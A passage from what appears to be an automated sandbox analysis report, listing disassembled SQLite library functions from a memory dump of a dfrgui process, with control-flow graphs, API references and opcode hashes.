                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_mutex_try
                                                                                              • String ID: 0
                                                                                              • API String ID: 2794522359-4108050209
                                                                                              • Opcode ID: b40f6e538b8f0b04e2242111901c35f0d3ac3950cb2c7f33ea6feeba81fb13a6
                                                                                              • Instruction ID: ad066da3eee73bf1192e979285553922ddeee5aa2cf31c0f95315944b97c264a
                                                                                              • Opcode Fuzzy Hash: b40f6e538b8f0b04e2242111901c35f0d3ac3950cb2c7f33ea6feeba81fb13a6
                                                                                              • Instruction Fuzzy Hash: 69128A70A042458FEF15CFA8E484799BBF1BF88308F24C1A9D855DB396E774E896CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E64B10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 772 61e64b10-61e64b27 773 61e64b40 call 61e64660 772->773 774 61e64b29-61e64b38 call 61e03c3f 772->774 778 61e64b45-61e64b47 773->778 779 61e64cf7-61e64cfb 774->779 780 61e64b3e 774->780 778->774 781 61e64b49 778->781 784 61e64d5d-61e64d64 779->784 785 61e64cfd-61e64d01 779->785 782 61e64b4e-61e64b52 780->782 783 61e64d3c-61e64d3e 781->783 786 61e64ceb-61e64cef 782->786 787 61e64b58-61e64b6a call 61e020b0 782->787 783->784 785->784 788 61e64d03-61e64d18 785->788 786->783 789 61e64cf1-61e64cf5 786->789 797 61e64bd0-61e64be0 787->797 798 61e64b6c-61e64b89 sqlite3_strnicmp 787->798 791 61e64d40-61e64d5b call 61e29ab5 788->791 792 61e64d1a-61e64d37 call 61e29ab5 788->792 789->788 791->783 792->783 800 61e64be2-61e64be5 797->800 801 61e64bea-61e64bf2 797->801 798->786 799 61e64b8f-61e64b9c call 61e04223 798->799 799->786 807 61e64ba2-61e64ba6 799->807 800->784 803 61e64bf4-61e64bfa 801->803 804 61e64c00-61e64c15 call 61e11da6 801->804 803->786 803->804 804->786 810 61e64c1b-61e64c2a call 61e120ce 804->810 807->786 809 61e64bac-61e64bca call 61e135cf 807->809 809->786 809->797 815 61e64c2c-61e64c36 call 61e0fc6a 810->815 816 61e64c3b-61e64ca9 call 61e120ce call 61e2c964 * 2 call 61e120ce call 61e2c964 call 61e2de36 810->816 815->786 816->800 831 61e64caf-61e64cd6 call 61e29ab5 call 61e0fc6a 816->831 831->786 836 61e64cd8-61e64ce4 call 61e15670 831->836 836->786
                                                                                              APIs
                                                                                              • sqlite3_strnicmp.SQLITE3 ref: 61E64B82
                                                                                                • Part of subcall function 61E04223: sqlite3_stricmp.SQLITE3 ref: 61E04258
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmpsqlite3_strnicmp
                                                                                              • String ID: no such table$no such view
                                                                                              • API String ID: 456569458-301769730
                                                                                              • Opcode ID: 378c4d14444fbddb170a93b06ed421545e41578179949f3a243ed110ebec3f76
                                                                                              • Instruction ID: 7cdf25bb30b9c9dd2eb5023db15eb566dabc622bbdaff7711f9e7c07361ce5a0
                                                                                              • Opcode Fuzzy Hash: 378c4d14444fbddb170a93b06ed421545e41578179949f3a243ed110ebec3f76
                                                                                              • Instruction Fuzzy Hash: D0612574B043469BEB04CFA8C4A075ABBF5BF99348F64C82EE8699B354D734D841CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E23DE7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 839 61e23de7-61e23e0f 840 61e23e11 839->840 841 61e23e59-61e23e78 839->841 842 61e23e13-61e23e16 840->842 843 61e23e18-61e23e27 840->843 844 61e23e7b-61e23ea2 ReadFile 841->844 842->841 842->843 845 61e23e29 843->845 846 61e23e3c-61e23e56 843->846 847 61e23ea4-61e23eb7 call 61e238ff 844->847 848 61e23ebd-61e23ec6 844->848 850 61e23e2b-61e23e2d 845->850 851 61e23e2f-61e23e3a 845->851 846->841 854 61e23eb9-61e23ebb 847->854 855 61e23efc-61e23f08 847->855 848->847 857 61e23ec8-61e23ed5 call 61e189f3 848->857 850->846 850->851 851->854 856 61e23f0d-61e23f14 854->856 855->856 857->844 860 61e23ed7-61e23efa call 61e22ebc 857->860 860->856
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID: winRead
                                                                                              • API String ID: 2738559852-2759563040
                                                                                              • Opcode ID: 699cdfbc135b3443815dc916025ce5228ff21ff9415388ad0f34fca2444ef200
                                                                                              • Instruction ID: 2a01e1fe44df80eaee3282d5dac42feed0a5c240c128c2012f7475d0b22193d0
                                                                                              • Opcode Fuzzy Hash: 699cdfbc135b3443815dc916025ce5228ff21ff9415388ad0f34fca2444ef200
                                                                                              • Instruction Fuzzy Hash: 6441E375A003599BCF04DFA8D89058EBBF2FF88314F25852AF869A7344D730E9568F91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E10F19 Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 863 61e10f19-61e10f2f 864 61e10f35-61e10f3b 863->864 865 61e11014 863->865 864->865 867 61e10f41-61e10f4a 864->867 866 61e11016-61e1101d 865->866 868 61e10f50-61e10f6e sqlite3_mutex_enter 867->868 869 61e11009-61e11012 867->869 872 61e10f70 868->872 873 61e10f76-61e10f85 868->873 869->866 872->873 874 61e10f87 873->874 875 61e10fc9-61e10fcc call 61e23fdb 873->875 876 61e10f89-61e10f8c 874->876 877 61e10f8e-61e10fa5 874->877 878 61e10fd2-61e10fd6 875->878 876->875 876->877 879 61e10fa7 877->879 880 61e10fbf 877->880 881 61e10ff8-61e11007 sqlite3_mutex_leave 878->881 882 61e10fd8-61e10ff3 call 61e0178f call 61e0149c * 2 878->882 883 61e10fa9-61e10fac 879->883 884 61e10fae-61e10fbd call 61e0a0e3 879->884 880->875 881->866 882->881 883->880 883->884 884->875
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E10F58
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E11000
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              • Opcode ID: d8ebcc908aa62e7fc97b4d17e27821b9c60942c315853f9de0b31af3f9893062
                                                                                              • Instruction ID: 86538fc627c54d925dcd47611d8193b0673bcc57cc095effbd2c286c8c14f183
                                                                                              • Opcode Fuzzy Hash: d8ebcc908aa62e7fc97b4d17e27821b9c60942c315853f9de0b31af3f9893062
                                                                                              • Instruction Fuzzy Hash: A821A131E18F508BDB009FBAC88635D7AF1BB8A319F25892EE414C7394E775C8D58B41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E23FDB Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 893 61e23fdb-61e23ff2 malloc 894 61e24001-61e2401c sqlite3_log 893->894 895 61e23ff4-61e23fff 893->895 896 61e2401f-61e24024 894->896 895->896
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: mallocsqlite3_log
                                                                                              • String ID:
                                                                                              • API String ID: 2785431543-0
                                                                                              • Opcode ID: f08ea4ef2bc967041590ca38efeb938d017deab71da1e65acc777e30af070951
                                                                                              • Instruction ID: 18c3f87e9ed8ef538eb54458e92fdbd9b46ad25a46ba29652b5fc8f0ba0fca1c
                                                                                              • Opcode Fuzzy Hash: f08ea4ef2bc967041590ca38efeb938d017deab71da1e65acc777e30af070951
                                                                                              • Instruction Fuzzy Hash: 8CF0C9B1C0930A9BDB009FA5C9D5A1DBBE4AB45348F54C86ED9894F351D23AE9C0CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E14545 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 897 61e14545-61e14556 898 61e14558-61e1455a 897->898 899 61e14561-61e14567 898->899 900 61e1455c-61e1455f 898->900 901 61e14569-61e1456b 899->901 900->898 902 61e14572-61e14583 901->902 903 61e1456d-61e14570 901->903 904 61e14589-61e14595 902->904 905 61e1469d-61e146a4 902->905 903->901 906 61e145a5-61e145ba 904->906 907 61e14597-61e145a0 sqlite3_free 904->907 908 61e145f6-61e145f8 906->908 909 61e145bc-61e145be 906->909 907->906 910 61e145fa-61e1461d 908->910 909->908 911 61e145c0-61e145c5 909->911 912 61e14674-61e14693 910->912 913 61e1461f-61e1462b 910->913 911->910 914 61e145c7-61e145d0 call 61e016d8 call 61e10f19 911->914 912->905 915 61e1462d-61e14631 913->915 921 61e145d5-61e145e2 call 61e016e9 914->921 917 61e14633-61e14646 915->917 918 61e14648-61e14672 915->918 917->915 918->905 921->910 924 61e145e4-61e145f4 call 61e0178f 921->924 924->910
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free
                                                                                              • String ID:
                                                                                              • API String ID: 2313487548-0
                                                                                              • Opcode ID: 7f7cea7cef2ba8ea961828c611947be7be1389695d99ccc4130f707361d7da3e
                                                                                              • Instruction ID: f50be9ba5c1b0c2911c29155d2826de08197b922455dcdf0975d1099d5082c20
                                                                                              • Opcode Fuzzy Hash: 7f7cea7cef2ba8ea961828c611947be7be1389695d99ccc4130f707361d7da3e
                                                                                              • Instruction Fuzzy Hash: 69416D729092258BDF058FA9C4813DA7BE0AF8874CF19827ACC19AF349D775D941CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 61E274A1 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E274F6
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E27516
                                                                                              • sqlite3_value_blob.SQLITE3 ref: 61E27523
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E2753A
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E2758A
                                                                                              • sqlite3_result_text64.SQLITE3 ref: 61E276DA
                                                                                              • sqlite3_result_blob64.SQLITE3 ref: 61E27734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3992148849-0
                                                                                              • Opcode ID: cdbb6ea1e6542cf43c30bf3fefd700a6c6400adbad9e12c780b5c545ad40c72e
                                                                                              • Instruction ID: aadb831bf2c816ccb74864488e9a6df9becc9d63084df94e6c6d8c3340ce1173
                                                                                              • Opcode Fuzzy Hash: cdbb6ea1e6542cf43c30bf3fefd700a6c6400adbad9e12c780b5c545ad40c72e
                                                                                              • Instruction Fuzzy Hash: 01919675E0465A8FDB15CFACC8A069DBBF1BF99324F29C229E86497390D730D842CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E35BE2 Relevance: 7.8, APIs: 5, Instructions: 346COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_malloc64$memcmpsqlite3_freesqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 1852262425-0
                                                                                              • Opcode ID: 23b33126de6fa61d4f96038fce0ff116e7f8b2b46e6fa9188007586d45807885
                                                                                              • Instruction ID: 02d9e73a4d75a8533b42b145884c5535c7e5caa48c7c518facce1235b45f7153
                                                                                              • Opcode Fuzzy Hash: 23b33126de6fa61d4f96038fce0ff116e7f8b2b46e6fa9188007586d45807885
                                                                                              • Instruction Fuzzy Hash: 31E105B5A042598FDB04CFA9C48069ABBF2BF89314F25C569EC54AB305D734E952CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E936A0 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 61E936D9
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E936EA
                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E936F2
                                                                                              • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E936FA
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E93709
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: 138953795b9fe2b575285812b066ebf488249d8455cad0fd75461130b1b22ef6
                                                                                              • Instruction ID: b209c06aea25f3d64433100c479b1c5550f2a21ea24959938b60b4d125f1eaca
                                                                                              • Opcode Fuzzy Hash: 138953795b9fe2b575285812b066ebf488249d8455cad0fd75461130b1b22ef6
                                                                                              • Instruction Fuzzy Hash: 6F1170B69553028FCB00DFB8D68855BBBE0FF89655F050D3AE548CB310DB35E9898B92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E77880 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E77899
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E77AA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID: BINARY$INTEGER
                                                                                              • API String ID: 1477753154-1676293250
                                                                                              • Opcode ID: 5e06206334b4d531d4b3c62b2c6304f7dbfd6b2a10f546ad8ea165f5ed010c5e
                                                                                              • Instruction ID: 1044a81a53b07995d5badf5316baec31532fec3bfb6b1efb4b640aadce748d5e
                                                                                              • Opcode Fuzzy Hash: 5e06206334b4d531d4b3c62b2c6304f7dbfd6b2a10f546ad8ea165f5ed010c5e
                                                                                              • Instruction Fuzzy Hash: 76712675E0565A9FEB10CFA9C484B9EBBF1FB88358F25C429E858AB350D734D841CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E478BD Relevance: 6.4, APIs: 4, Instructions: 422COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E478D2
                                                                                                • Part of subcall function 61E13FAA: sqlite3_mutex_try.SQLITE3(?,?,?,61E1402A), ref: 61E13F4A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E478EB
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E47A04
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E47E0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                              • String ID:
                                                                                              • API String ID: 2068833801-0
                                                                                              • Opcode ID: 2c36d3ab45f1d7f0858256d9985ba77d2749cea59f42bc52cde9f2843c53188b
                                                                                              • Instruction ID: feac0f90fe3517d3deac35505311846ccacd4189e3bf8def63778e0d83a3f0f5
                                                                                              • Opcode Fuzzy Hash: 2c36d3ab45f1d7f0858256d9985ba77d2749cea59f42bc52cde9f2843c53188b
                                                                                              • Instruction Fuzzy Hash: 02020574E042598FDB08CFA8D590A9DBBF2BF88318F29C459E845AB355D734EC41CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E259F3 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_bind_int64.SQLITE3 ref: 61E25A35
                                                                                                • Part of subcall function 61E25863: sqlite3_mutex_leave.SQLITE3 ref: 61E258A2
                                                                                              • sqlite3_bind_double.SQLITE3 ref: 61E25A58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
